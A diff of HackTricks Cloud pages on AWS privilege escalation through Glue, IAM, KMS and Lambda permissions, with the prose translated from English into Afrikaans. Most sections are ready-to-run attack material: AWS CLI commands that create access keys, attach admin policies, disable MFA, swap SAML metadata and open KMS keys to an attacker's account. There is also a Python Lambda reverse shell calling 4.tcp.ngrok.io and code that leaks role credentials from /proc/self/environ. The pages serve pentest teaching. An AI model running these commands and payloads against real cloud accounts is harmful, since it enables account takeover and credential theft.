-Users with these permissions can **set up a new AWS Glue development endpoint**, **assigning an existing service role assumable by Glue** with specific permissions to this endpoint.
-
-After the setup, the **attacker can SSH into the endpoint's instance**, and steal the IAM credentials of the assigned role:
+Gebruikers met hierdie toestemmings kan **'n nuwe AWS Glue ontwikkelingspunt opstel**, **'n bestaande diensrol wat deur Glue aanvaarbaar is, aan hierdie punt toewys** met spesifieke toestemmings.
 
+Na die opstelling kan die **aanvaller SSH in die punt se instansie**, en die IAM-akkrediteer van die toegewyde rol steel:
 ```bash
 # Create endpoint
 aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
-    --role-arn <arn-role> \
-    --public-key file:///ssh/key.pub
+--role-arn <arn-role> \
+--public-key file:///ssh/key.pub
 
 # Get the public address of the instance
 ## You could also use get-dev-endpoints
@@ -23,19 +22,17 @@ aws glue get-dev-endpoint --endpoint-name privesctest
 # SSH with the glue user
 ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
 ```
+Vir stealth-doeleindes word dit aanbeveel om die IAM-akkrediteerlinge van binne die Glue virtuele masjien te gebruik.
 
-For stealth purpose, it's recommended to use the IAM credentials from inside the Glue virtual machine.
-
-**Potential Impact:** Privesc to the glue service role specified.
+**Potensiële Impak:** Privesc na die spesifieke glue diensrol.
 
 ### `glue:UpdateDevEndpoint`, (`glue:GetDevEndpoint` | `glue:GetDevEndpoints`)
 
-Users with this permission can **alter an existing Glue development** endpoint's SSH key, **enabling SSH access to it**. This allows the attacker to execute commands with the privileges of the endpoint's attached role:
-
+Gebruikers met hierdie toestemming kan **'n bestaande Glue ontwikkeling** eindpunt se SSH-sleutel **verander, wat SSH-toegang tot dit moontlik maak**. Dit stel die aanvaller in staat om opdragte uit te voer met die voorregte van die eindpunt se aangehegte rol:
 ```bash
 # Change public key to connect
 aws glue --endpoint-name target_endpoint \
-    --public-key file:///ssh/key.pub
+--public-key file:///ssh/key.pub
 
 # Get the public address of the instance
 ## You could also use get-dev-endpoints
@@ -44,13 +41,11 @@ aws glue get-dev-endpoint --endpoint-name privesctest
 # SSH with the glue user
 ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com
 ```
-
-**Potential Impact:** Privesc to the glue service role used.
+**Potensiële Impak:** Privesc na die glue diensrol wat gebruik word.
 
 ### `iam:PassRole`, (`glue:CreateJob` | `glue:UpdateJob`), (`glue:StartJobRun` | `glue:CreateTrigger`)
 
-Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:UpdateJob`**, and either **`glue:StartJobRun` or `glue:CreateTrigger`** can **create or update an AWS Glue job**, attaching any **Glue service account**, and initiate the job's execution. The job's capabilities include running arbitrary Python code, which can be exploited to establish a reverse shell. This reverse shell can then be utilized to exfiltrate the **IAM credential**s of the role attached to the Glue job, leading to potential unauthorized access or actions based on the permissions of that role:
-
+Gebruikers met **`iam:PassRole`** gekombineer met ofwel **`glue:CreateJob of `glue:UpdateJob`**, en ofwel **`glue:StartJobRun` of `glue:CreateTrigger`** kan **'n AWS Glue taak skep of opdateer**, enige **Glue diensrekening** aanheg, en die taak se uitvoering inisieer. Die taak se vermoëns sluit die uitvoering van arbitrêre Python kode in, wat uitgebuit kan word om 'n omgekeerde shell te vestig. Hierdie omgekeerde shell kan dan gebruik word om die **IAM geloofsbriewe** van die rol wat aan die Glue taak geheg is, te eksfiltreer, wat kan lei tot potensiële ongeoorloofde toegang of aksies gebaseer op die toestemmings van daardie rol:
 ```bash
 # Content of the python script saved in s3:
 #import socket,subprocess,os
@@ -65,32 +60,27 @@ Users with **`iam:PassRole`** combined with either **`glue:CreateJob` or `glue:U
 
 # A Glue role with admin access was created
 aws glue create-job \
-    --name privesctest \
-    --role arn:aws:iam::93424712358:role/GlueAdmin \
-    --command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'
+--name privesctest \
+--role arn:aws:iam::93424712358:role/GlueAdmin \
+--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'
 
 # You can directly start the job
 aws glue start-job-run --job-name privesctest
 # Or you can create a trigger to start it
 aws glue create-trigger --name triggerprivesc --type SCHEDULED \
-    --actions '[{"JobName": "privesctest"}]' --start-on-creation \
-    --schedule "0/5 * * * * *"  #Every 5mins, feel free to change
+--actions '[{"JobName": "privesctest"}]' --start-on-creation \
+--schedule "0/5 * * * * *"  #Every 5mins, feel free to change
 ```
-
-**Potential Impact:** Privesc to the glue service role specified.
+**Potensiële Impak:** Privesc na die glue diensrol gespesifiseer.
 
 ### `glue:UpdateJob`
 
-Just with the update permission an attacked could steal the IAM Credentials of the already attached role.
+Net met die opdatering toestemming kan 'n aanvaller die IAM Kredensiale van die reeds aangehegte rol steel.
 
-**Potential Impact:** Privesc to the glue service role attached.
+**Potensiële Impak:** Privesc na die glue diensrol aangeheg.
 
-## References
+## Verwysings
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
index 7807f6152..9ed078a96 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.md
@@ -4,7 +4,7 @@
 
 ## IAM
 
-For more info about IAM check:
+Vir meer inligting oor IAM, kyk:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
@@ -12,228 +12,189 @@ For more info about IAM check:
 
 ### **`iam:CreatePolicyVersion`**
 
-Grants the ability to create a new IAM policy version, bypassing the need for `iam:SetDefaultPolicyVersion` permission by using the `--set-as-default` flag. This enables defining custom permissions.
+Gee die vermoë om 'n nuwe IAM-beleid weergawe te skep, wat die behoefte aan `iam:SetDefaultPolicyVersion` toestemming omseil deur die `--set-as-default` vlag te gebruik. Dit stel in staat om pasgemaakte toestemmings te definieer.
 
 **Exploit Command:**
-
 ```bash
 aws iam create-policy-version --policy-arn <target_policy_arn> \
-    --policy-document file:///path/to/administrator/policy.json --set-as-default
+--policy-document file:///path/to/administrator/policy.json --set-as-default
 ```
-
-**Impact:** Directly escalates privileges by allowing any action on any resource.
+**Impak:** Verhoog direk die voorregte deur enige aksie op enige hulpbron toe te laat.
 
 ### **`iam:SetDefaultPolicyVersion`**
 
-Allows changing the default version of an IAM policy to another existing version, potentially escalating privileges if the new version has more permissions.
-
-**Bash Command:**
+Laat die verandering van die standaardweergawe van 'n IAM-beleid na 'n ander bestaande weergawe toe, wat moontlik voorregte kan verhoog as die nuwe weergawe meer toestemmings het.
 
+**Bash Opdrag:**
 ```bash
 aws iam set-default-policy-version --policy-arn <target_policy_arn> --version-id v2
 ```
-
-**Impact:** Indirect privilege escalation by enabling more permissions.
+**Impak:** Indirekte privilige-escalasie deur meer toestemmings te aktiveer.
 
 ### **`iam:CreateAccessKey`**
 
-Enables creating access key ID and secret access key for another user, leading to potential privilege escalation.
-
-**Exploit:**
+Aktiveer die skep van toegangsleutel-ID en geheime toegangsleutel vir 'n ander gebruiker, wat kan lei tot potensiële privilige-escalasie.
 
+**Eksploiteer:**
 ```bash
 aws iam create-access-key --user-name <target_user>
 ```
-
-**Impact:** Direct privilege escalation by assuming another user's extended permissions.
+**Impak:** Direkte privilege-eskalasie deur 'n ander gebruiker se uitgebreide toestemmings aan te neem.
 
 ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**
 
-Permits creating or updating a login profile, including setting passwords for AWS console login, leading to direct privilege escalation.
-
-**Exploit for Creation:**
+Stel die skep of opdatering van 'n aanmeldprofiel toe, insluitend die instelling van wagwoorde vir AWS-konsol aanmelding, wat lei tot direkte privilege-eskalasie.
 
+**Eksploiteer vir Skepping:**
 ```bash
 aws iam create-login-profile --user-name target_user --no-password-reset-required \
-    --password '<password>'
+--password '<password>'
 ```
-
-**Exploit for Update:**
-
+**Eksploiteer vir Opdatering:**
 ```bash
 aws iam update-login-profile --user-name target_user --no-password-reset-required \
-    --password '<password>'
+--password '<password>'
 ```
-
-**Impact:** Direct privilege escalation by logging in as "any" user.
+**Impak:** Direkte privilige-escalasie deur in te log as "enige" gebruiker.
 
 ### **`iam:UpdateAccessKey`**
 
-Allows enabling a disabled access key, potentially leading to unauthorized access if the attacker possesses the disabled key.
-
-**Exploit:**
+Laat toe om 'n gedeaktiveerde toegangsleutel te aktiveer, wat moontlik kan lei tot ongemagtigde toegang as die aanvaller die gedeaktiveerde sleutel besit.
 
+**Eksploiteer:**
 ```bash
 aws iam update-access-key --access-key-id <ACCESS_KEY_ID> --status Active --user-name <username>
 ```
-
-**Impact:** Direct privilege escalation by reactivating access keys.
+**Impak:** Direkte privilige-escalasie deur toegangssleutels te heraktiveer.
 
 ### **`iam:CreateServiceSpecificCredential` | `iam:ResetServiceSpecificCredential`**
 
-Enables generating or resetting credentials for specific AWS services (e.g., CodeCommit, Amazon Keyspaces), inheriting the permissions of the associated user.
-
-**Exploit for Creation:**
+Stel die generering of reset van kredensiale vir spesifieke AWS-dienste (bv. CodeCommit, Amazon Keyspaces) in, wat die toestemmings van die geassosieerde gebruiker erf.
 
+**Eksploiteer vir Skepping:**
 ```bash
 aws iam create-service-specific-credential --user-name <username> --service-name <service>
 ```
-
-**Exploit for Reset:**
-
+**Eksploiteer vir Herstel:**
 ```bash
 aws iam reset-service-specific-credential --service-specific-credential-id <credential_id>
 ```
-
-**Impact:** Direct privilege escalation within the user's service permissions.
+**Impak:** Direkte privilige-escalasie binne die gebruiker se diens toestemmings.
 
 ### **`iam:AttachUserPolicy` || `iam:AttachGroupPolicy`**
 
-Allows attaching policies to users or groups, directly escalating privileges by inheriting the permissions of the attached policy.
-
-**Exploit for User:**
+Stel in staat om beleide aan gebruikers of groepe te heg, wat direk privilige verhoog deur die toestemmings van die gehegte beleid te erf.
 
+**Eksploiteer vir Gebruiker:**
 ```bash
 aws iam attach-user-policy --user-name <username> --policy-arn "<policy_arn>"
 ```
-
-**Exploit for Group:**
-
+**Eksploiteer vir Groep:**
 ```bash
 aws iam attach-group-policy --group-name <group_name> --policy-arn "<policy_arn>"
 ```
-
-**Impact:** Direct privilege escalation to anything the policy grants.
+**Impak:** Direkte privilege-escalasie na enigiets wat die beleid toelaat.
 
 ### **`iam:AttachRolePolicy`,** ( `sts:AssumeRole`|`iam:createrole`) | **`iam:PutUserPolicy` | `iam:PutGroupPolicy` | `iam:PutRolePolicy`**
 
-Permits attaching or putting policies to roles, users, or groups, enabling direct privilege escalation by granting additional permissions.
-
-**Exploit for Role:**
+Stel die aanhegting of plasing van beleide aan rolle, gebruikers of groepe toe, wat direkte privilege-escalasie moontlik maak deur addisionele toestemmings te verleen.
 
+**Eksploiteer vir Rol:**
 ```bash
 aws iam attach-role-policy --role-name <role_name> --policy-arn "<policy_arn>"
 ```
-
-**Exploit for Inline Policies:**
-
+**Eksploiteer vir Inline Beleide:**
 ```bash
 aws iam put-user-policy --user-name <username> --policy-name "<policy_name>" \
-    --policy-document "file:///path/to/policy.json"
+--policy-document "file:///path/to/policy.json"
 
 aws iam put-group-policy --group-name <group_name> --policy-name "<policy_name>" \
-    --policy-document file:///path/to/policy.json
+--policy-document file:///path/to/policy.json
 
 aws iam put-role-policy --role-name <role_name> --policy-name "<policy_name>" \
-    --policy-document file:///path/to/policy.json
+--policy-document file:///path/to/policy.json
 ```
-
-You can use a policy like:
-
+U kan 'n beleid soos gebruik:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": ["*"],
-      "Resource": ["*"]
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": ["*"],
+"Resource": ["*"]
+}
+]
 }
 ```
-
-**Impact:** Direct privilege escalation by adding permissions through policies.
+**Impak:** Direkte privilige-escalasie deur die toevoeging van toestemmings deur beleid.
 
 ### **`iam:AddUserToGroup`**
 
-Enables adding oneself to an IAM group, escalating privileges by inheriting the group's permissions.
-
-**Exploit:**
+Stel in staat om jouself by 'n IAM-groep te voeg, wat privilige-escalasie moontlik maak deur die groep se toestemmings te erf.
 
+**Eksploiteer:**
 ```bash
 aws iam add-user-to-group --group-name <group_name> --user-name <username>
 ```
-
-**Impact:** Direct privilege escalation to the level of the group's permissions.
+**Impak:** Direkte privilige-escalasie na die vlak van die groep se toestemmings.
 
 ### **`iam:UpdateAssumeRolePolicy`**
 
-Allows altering the assume role policy document of a role, enabling the assumption of the role and its associated permissions.
-
-**Exploit:**
+Stel in staat om die aanneemrolbeleid dokument van 'n rol te verander, wat die aanneming van die rol en sy geassosieerde toestemmings moontlik maak.
 
+**Eksploiteer:**
 ```bash
 aws iam update-assume-role-policy --role-name <role_name> \
-    --policy-document file:///path/to/assume/role/policy.json
+--policy-document file:///path/to/assume/role/policy.json
 ```
-
-Where the policy looks like the following, which gives the user permission to assume the role:
-
+Waar die beleid soos die volgende lyk, wat die gebruiker toestemming gee om die rol aan te neem:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": "sts:AssumeRole",
-      "Principal": {
-        "AWS": "$USER_ARN"
-      }
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": "sts:AssumeRole",
+"Principal": {
+"AWS": "$USER_ARN"
+}
+}
+]
 }
 ```
-
-**Impact:** Direct privilege escalation by assuming any role's permissions.
+**Impak:** Direkte privilige-escalasie deur enige rol se toestemmings aan te neem.
 
 ### **`iam:UploadSSHPublicKey` || `iam:DeactivateMFADevice`**
 
-Permits uploading an SSH public key for authenticating to CodeCommit and deactivating MFA devices, leading to potential indirect privilege escalation.
-
-**Exploit for SSH Key Upload:**
+Toelaat om 'n SSH publieke sleutel op te laai vir outentisering by CodeCommit en om MFA toestelle te deaktiveer, wat kan lei tot potensiële indirekte privilige-escalasie.
 
+**Eksploiteer vir SSH Sleutel Oplaai:**
 ```bash
 aws iam upload-ssh-public-key --user-name <username> --ssh-public-key-body <key_body>
 ```
-
-**Exploit for MFA Deactivation:**
-
+**Eksploiteer vir MFA Deaktivering:**
 ```bash
 aws iam deactivate-mfa-device --user-name <username> --serial-number <serial_number>
 ```
-
-**Impact:** Indirect privilege escalation by enabling CodeCommit access or disabling MFA protection.
+**Impak:** Indirekte privilige-escalasie deur CodeCommit-toegang te aktiveer of MFA-beskerming te deaktiveer.
 
 ### **`iam:ResyncMFADevice`**
 
-Allows resynchronization of an MFA device, potentially leading to indirect privilege escalation by manipulating MFA protection.
-
-**Bash Command:**
+Stel die her-synchronisasie van 'n MFA-toestel toe, wat moontlik kan lei tot indirekte privilige-escalasie deur MFA-beskerming te manipuleer.
 
+**Bash-opdrag:**
 ```bash
 aws iam resync-mfa-device --user-name <username> --serial-number <serial_number> \
-    --authentication-code1 <code1> --authentication-code2 <code2>
+--authentication-code1 <code1> --authentication-code2 <code2>
 ```
-
-**Impact:** Indirect privilege escalation by adding or manipulating MFA devices.
+**Impak:** Indirekte privilige-escalasie deur MFA-toestelle by te voeg of te manipuleer.
 
 ### `iam:UpdateSAMLProvider`, `iam:ListSAMLProviders`, (`iam:GetSAMLProvider`)
 
-With these permissions you can **change the XML metadata of the SAML connection**. Then, you could abuse the **SAML federation** to **login** with any **role that is trusting** it.
-
-Note that doing this **legit users won't be able to login**. However, you could get the XML, so you can put yours, login and configure the previous back
+Met hierdie toestemmings kan jy **die XML-metadata van die SAML-verbinding verander**. Dan kan jy die **SAML-federasie** misbruik om **in te log** met enige **rol wat dit vertrou**.
 
+Let daarop dat legitieme gebruikers nie in staat sal wees om in te log nie. Jy kan egter die XML kry, sodat jy joune kan plaas, inlog en die vorige weer kan konfigureer.
 ```bash
 # List SAMLs
 aws iam list-saml-providers
@@ -249,14 +210,12 @@ aws iam update-saml-provider --saml-metadata-document <value> --saml-provider-ar
 # Optional: Set the previous XML back
 aws iam update-saml-provider --saml-metadata-document <previous-xml> --saml-provider-arn <arn>
 ```
-
 > [!NOTE]
-> TODO: A Tool capable of generating the SAML metadata and login with a specified role
+> TODO: 'n Gereedskap wat in staat is om die SAML metadata te genereer en aan te meld met 'n gespesifiseerde rol
 
 ### `iam:UpdateOpenIDConnectProviderThumbprint`, `iam:ListOpenIDConnectProviders`, (`iam:`**`GetOpenIDConnectProvider`**)
 
-(Unsure about this) If an attacker has these **permissions** he could add a new **Thumbprint** to manage to login in all the roles trusting the provider.
-
+(Onseker oor dit) As 'n aanvaller hierdie **toestemmings** het, kan hy 'n nuwe **Thumbprint** byvoeg om in te log in al die rolle wat die verskaffer vertrou.
 ```bash
 # List providers
 aws iam list-open-id-connect-providers
@@ -265,13 +224,8 @@ aws iam get-open-id-connect-provider --open-id-connect-provider-arn <ARN>
 # Update Thumbprints (The thumbprint is always a 40-character string)
 aws iam update-open-id-connect-provider-thumbprint --open-id-connect-provider-arn <ARN> --thumbprint-list 359755EXAMPLEabc3060bce3EXAMPLEec4542a3
 ```
-
-## References
+## Verwysings
 
 - [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
index 02c05b76d..1f7618a6f 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.md
@@ -4,7 +4,7 @@
 
 ## KMS
 
-For more info about KMS check:
+Vir meer inligting oor KMS, kyk:
 
 {{#ref}}
 ../aws-services/aws-kms-enum.md
@@ -12,8 +12,7 @@ For more info about KMS check:
 
 ### `kms:ListKeys`,`kms:PutKeyPolicy`, (`kms:ListKeyPolicies`, `kms:GetKeyPolicy`)
 
-With these permissions it's possible to **modify the access permissions to the key** so it can be used by other accounts or even anyone:
-
+Met hierdie toestemmings is dit moontlik om **die toegangstoestemmings tot die sleutel te wysig** sodat dit deur ander rekeninge of selfs enigiemand gebruik kan word:
 ```bash
 aws kms list-keys
 aws kms list-key-policies --key-id <id> # Although only 1 max per key
@@ -21,106 +20,91 @@ aws kms get-key-policy --key-id <id> --policy-name <policy_name>
 # AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
 aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json
 ```
-
-policy.json:
-
+beleid.json:
 ```json
 {
-  "Version": "2012-10-17",
-  "Id": "key-consolepolicy-3",
-  "Statement": [
-    {
-      "Sid": "Enable IAM User Permissions",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::<origin_account>:root"
-      },
-      "Action": "kms:*",
-      "Resource": "*"
-    },
-    {
-      "Sid": "Allow all use",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam::<attackers_account>:root"
-      },
-      "Action": ["kms:*"],
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::<origin_account>:root"
+},
+"Action": "kms:*",
+"Resource": "*"
+},
+{
+"Sid": "Allow all use",
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam::<attackers_account>:root"
+},
+"Action": ["kms:*"],
+"Resource": "*"
+}
+]
 }
 ```
-
 ### `kms:CreateGrant`
 
-It **allows a principal to use a KMS key:**
-
+Dit **laat 'n hoof gebruik maak van 'n KMS-sleutel:**
 ```bash
 aws kms create-grant \
-    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
-    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
-    --operations Decrypt
+--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
+--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
+--operations Decrypt
 ```
+> [!WARNING]
+> 'n Toekenning kan slegs sekere tipes operasies toelaat: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
 
 > [!WARNING]
-> A grant can only allow certain types of operations: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
-
-> [!WARNING]
-> Note that it might take a couple of minutes for KMS to **allow the user to use the key after the grant has been generated**. Once that time has passed, the principal can use the KMS key without needing to specify anything.\
-> However, if it's needed to use the grant right away [use a grant token](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (check the following code).\
-> For [**more info read this**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).
-
+> Let daarop dat dit 'n paar minute kan neem voordat KMS **die gebruiker toelaat om die sleutel te gebruik nadat die toekenning gegenereer is**. Sodra daardie tyd verby is, kan die hoofpersoon die KMS-sleutel gebruik sonder om iets spesifiek aan te dui.\
+> As dit egter nodig is om die toekenning onmiddellik te gebruik [gebruik 'n toekenningstoken](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token) (kyk na die volgende kode).\
+> Vir [**meer inligting lees dit**](https://docs.aws.amazon.com/kms/latest/developerguide/grant-manage.html#using-grant-token).
 ```bash
 # Use the grant token in a request
 aws kms generate-data-key \
-    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
-    –-key-spec AES_256 \
-    --grant-tokens $token
+--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
+–-key-spec AES_256 \
+--grant-tokens $token
 ```
-
-Note that it's possible to list grant of keys with:
-
+Let daarop dat dit moontlik is om die toekennings van sleutels te lys met:
 ```bash
 aws kms list-grants --key-id <value>
 ```
-
 ### `kms:CreateKey`, `kms:ReplicateKey`
 
-With these permissions it's possible to replicate a multi-region enabled KMS key in a different region with a different policy.
-
-So, an attacker could abuse this to obtain privesc his access to the key and use it
+Met hierdie toestemmings is dit moontlik om 'n multi-region geaktiveerde KMS-sleutel in 'n ander streek met 'n ander beleid te repliseer.
 
+So, 'n aanvaller kan dit misbruik om privesc sy toegang tot die sleutel te verkry en dit te gebruik.
 ```bash
 aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml
 
 {
-    "Version": "2012-10-17",
-    "Id": "key-consolepolicy-3",
-    "Statement": [
-        {
-            "Sid": "Enable IAM User Permissions",
-            "Effect": "Allow",
-            "Principal": {
-                "AWS": "*"
-            },
-            "Action": "kms:*",
-            "Resource": "*"
-        }
-    ]
+"Version": "2012-10-17",
+"Id": "key-consolepolicy-3",
+"Statement": [
+{
+"Sid": "Enable IAM User Permissions",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "kms:*",
+"Resource": "*"
+}
+]
 }
 ```
-
 ### `kms:Decrypt`
 
-This permission allows to use a key to decrypt some information.\
-For more information check:
+Hierdie toestemming laat toe om 'n sleutel te gebruik om sekere inligting te ontsleutel.\
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-post-exploitation/aws-kms-post-exploitation.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
index d276ef737..0f9a5c240 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.md
@@ -4,7 +4,7 @@
 
 ## lambda
 
-More info about lambda in:
+Meer inligting oor lambda in:
 
 {{#ref}}
 ../aws-services/aws-lambda-enum.md
@@ -12,23 +12,22 @@ More info about lambda in:
 
 ### `iam:PassRole`, `lambda:CreateFunction`, (`lambda:InvokeFunction` | `lambda:InvokeFunctionUrl`)
 
-Users with the **`iam:PassRole`, `lambda:CreateFunction`, and `lambda:InvokeFunction`** permissions can escalate their privileges.\
-They can **create a new Lambda function and assign it an existing IAM role**, granting the function the permissions associated with that role. The user can then **write and upload code to this Lambda function (with a rev shell for example)**.\
-Once the function is set up, the user can **trigger its execution** and the intended actions by invoking the Lambda function through the AWS API. This approach effectively allows the user to perform tasks indirectly through the Lambda function, operating with the level of access granted to the IAM role associated with it.\\
-
-A attacker could abuse this to get a **rev shell and steal the token**:
+Gebruikers met die **`iam:PassRole`, `lambda:CreateFunction`, en `lambda:InvokeFunction`** toestemmings kan hul voorregte verhoog.\
+Hulle kan **'n nuwe Lambda-funksie skep en dit 'n bestaande IAM-rol toewys**, wat die funksie die toestemmings verleen wat met daardie rol geassosieer word. Die gebruiker kan dan **kode na hierdie Lambda-funksie skryf en oplaai (met 'n rev shell byvoorbeeld)**.\
+Sodra die funksie opgestel is, kan die gebruiker **die uitvoering daarvan aktiveer** en die beoogde aksies deur die Lambda-funksie via die AWS API aan te roep. Hierdie benadering stel die gebruiker effektief in staat om take indirek deur die Lambda-funksie uit te voer, werkend met die toegangsvlak wat aan die IAM-rol geassosieer is.\\
 
+'n Aanvaller kan dit misbruik om 'n **rev shell te kry en die token te steel**:
 ```python:rev.py
 import socket,subprocess,os,time
 def lambda_handler(event, context):
-   s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
-   s.connect(('4.tcp.ngrok.io',14305))
-   os.dup2(s.fileno(),0)
-   os.dup2(s.fileno(),1)
-   os.dup2(s.fileno(),2)
-   p=subprocess.call(['/bin/sh','-i'])
-   time.sleep(900)
-   return 0
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
+s.connect(('4.tcp.ngrok.io',14305))
+os.dup2(s.fileno(),0)
+os.dup2(s.fileno(),1)
+os.dup2(s.fileno(),2)
+p=subprocess.call(['/bin/sh','-i'])
+time.sleep(900)
+return 0
 ```
 
 ```bash
@@ -37,8 +36,8 @@ zip "rev.zip" "rev.py"
 
 # Create the function
 aws lambda create-function --function-name my_function \
-    --runtime python3.9 --role <arn_of_lambda_role> \
-    --handler rev.lambda_handler --zip-file fileb://rev.zip
+--runtime python3.9 --role <arn_of_lambda_role> \
+--handler rev.lambda_handler --zip-file fileb://rev.zip
 
 # Invoke the function
 aws lambda invoke --function-name my_function output.txt
@@ -47,99 +46,83 @@ aws lambda invoke --function-name my_function output.txt
 # List roles
 aws iam list-attached-user-policies --user-name <user-name>
 ```
-
-You could also **abuse the lambda role permissions** from the lambda function itself.\
-If the lambda role had enough permissions you could use it to grant admin rights to you:
-
+U kan ook **misbruik maak van die lambda rol toestemmings** vanaf die lambda funksie self.\
+As die lambda rol genoeg toestemmings gehad het, kan u dit gebruik om admin regte aan u toe te ken:
 ```python
 import boto3
 def lambda_handler(event, context):
-    client = boto3.client('iam')
-    response = client.attach_user_policy(
-        UserName='my_username',
-        PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
-    )
-    return response
+client = boto3.client('iam')
+response = client.attach_user_policy(
+UserName='my_username',
+PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
+)
+return response
 ```
-
-It is also possible to leak the lambda's role credentials without needing an external connection. This would be useful for **Network isolated Lambdas** used on internal tasks. If there are unknown security groups filtering your reverse shells, this piece of code will allow you to directly leak the credentials as the output of the lambda.
-
+Dit is ook moontlik om die lambda se rol geloofsbriewe te lek sonder om 'n eksterne verbinding te benodig. Dit sou nuttig wees vir **Network isolated Lambdas** wat op interne take gebruik word. As daar onbekende sekuriteitsgroepe is wat jou omgekeerde skulpies filter, sal hierdie stuk kode jou toelaat om die geloofsbriewe direk as die uitvoer van die lambda te lek.
 ```python
 def handler(event, context):
-    sessiontoken = open('/proc/self/environ', "r").read()
-    return {
-        'statusCode': 200,
-        'session': str(sessiontoken)
-    }
+sessiontoken = open('/proc/self/environ', "r").read()
+return {
+'statusCode': 200,
+'session': str(sessiontoken)
+}
 ```
 
 ```bash
 aws lambda invoke --function-name <lambda_name> output.txt
 cat output.txt
 ```
-
-**Potential Impact:** Direct privesc to the arbitrary lambda service role specified.
+**Potensiële Impak:** Direkte privesc na die arbitrêre lambda diensrol wat gespesifiseer is.
 
 > [!CAUTION]
-> Note that even if it might looks interesting **`lambda:InvokeAsync`** **doesn't** allow on it's own to **execute `aws lambda invoke-async`**, you also need `lambda:InvokeFunction`
+> Let daarop dat selfs al lyk dit interessant **`lambda:InvokeAsync`** **nie** op sy eie toelaat om **`aws lambda invoke-async`** uit te voer nie, jy het ook `lambda:InvokeFunction` nodig.
 
 ### `iam:PassRole`, `lambda:CreateFunction`, `lambda:AddPermission`
 
-Like in the previous scenario, you can **grant yourself the `lambda:InvokeFunction`** permission if you have the permission **`lambda:AddPermission`**
-
+Soos in die vorige scenario, kan jy **jouself die `lambda:InvokeFunction`** toestemming gee as jy die toestemming **`lambda:AddPermission`** het.
 ```bash
 # Check the previous exploit and use the following line to grant you the invoke permissions
 aws --profile "$NON_PRIV_PROFILE_USER" lambda add-permission --function-name my_function \
-   --action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
+--action lambda:InvokeFunction --statement-id statement_privesc --principal "$NON_PRIV_PROFILE_USER_ARN"
 ```
-
